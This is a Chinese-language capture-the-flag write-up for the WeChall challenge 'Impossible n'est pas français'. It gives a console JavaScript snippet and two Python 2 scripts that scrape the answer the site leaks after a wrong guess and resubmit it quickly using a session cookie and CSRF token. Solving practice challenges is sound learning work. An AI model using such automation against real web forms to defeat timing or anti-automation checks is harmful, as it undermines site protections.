Impossible n‘est pas français (Exploit) 答案
解决
直接说下做法。首先点击Click here to request a new number
请求一个数,然后任意提交一个错误答案,系统会将正确答案返回给我们。
所以题目的关键就是 快速将回显的答案提交过去。
JS
这是我自己写的js脚本。
text = document.getElementsByClassName("gwf_errors")[0].innerText
num = text.substr(40,text.length-41)
document.getElementsByTagName("tbody")[0].getElementsByTagName("input")[0].value = num
document.getElementsByTagName("tbody")[0].getElementsByTagName("input")[1].click()
首先f12打开开发者工具,切换到console面板,将上面代码粘贴上去,但是不要回车运行。
然后新标签打开请求新数链接,然后在answer输入框输入1
并提交。
这时候页面会出现正确答案。快速回车运行上面代码,成功!
python2
下面有两段python2代码可以参考一下。
这段代码来自OtherFiles/WeChall.md at master · lc4t/OtherFiles
import re
import requests
from bs4 import BeautifulSoup
cookie = {
'WC': '你的cookie'
}
def getNumber():
url = 'http://www.wechall.net/challenge/impossible/index.php?request=new_number'
result = requests.get(url, cookies=cookie)
def getAnswer():
getNumber()
url = 'http://www.wechall.net/challenge/impossible/index.php'
data = {
'solution': '123',
'cmd': 'Send',
'gwf3_csrf': 'EioRwZvt'
}
result = requests.post(url, cookies=cookie, data=data)
text = BeautifulSoup(result.text).get_text()
answer = re.compile(r'"(\d+)"').findall(text)[0]
return answer
def send():
url = 'http://www.wechall.net/challenge/impossible/index.php'
data = {
'solution': getAnswer(),
'cmd': 'Send',
'gwf3_csrf': 'EioRwZvt'
}
result = requests.post(url, cookies=cookie, data=data)
print result.text
# print 'Ok'
send()
下面这段来自WeChall Journal | 陈文青
#!/usr/bin/env python
# coding=utf-8
import lxml
import lxml.html as H
import requests
cookie = {
'WC': '你的cookie'
}
def get_number():
number_url = 'http://www.wechall.net/challenge/impossible/index.php?request=new_number'
resp = requests.get(number_url, cookies=cookie)
d = H.document_fromstring(resp.text)
return str(d.xpath('//div[@id=\'page\']')[0].text_content()).strip()
print get_number()
def get_answer():
post_data = {
'solution': '1+12',
'cmd': 'Send',
'gwf3_csrf': '2XDoWTUR'
}
url = 'http://www.wechall.net/challenge/impossible/index.php'
resp = requests.post(url, cookies=cookie, data=post_data)
# print resp.text
d = H.document_fromstring(resp.text)
import re
ar = re.compile(r'"(\d+)"')
text = d.xpath('//div[@class=\'gwf_errors\']/ul/li')[0].text_content()
ans = ar.findall(text)[0]
print ans
post_data = {
'solution': ans,
'cmd': 'Send',
'gwf3_csrf': '2XDoWTUR'
}
resp = requests.post(url, cookies=cookie, data=post_data)
print resp.text
get_answer()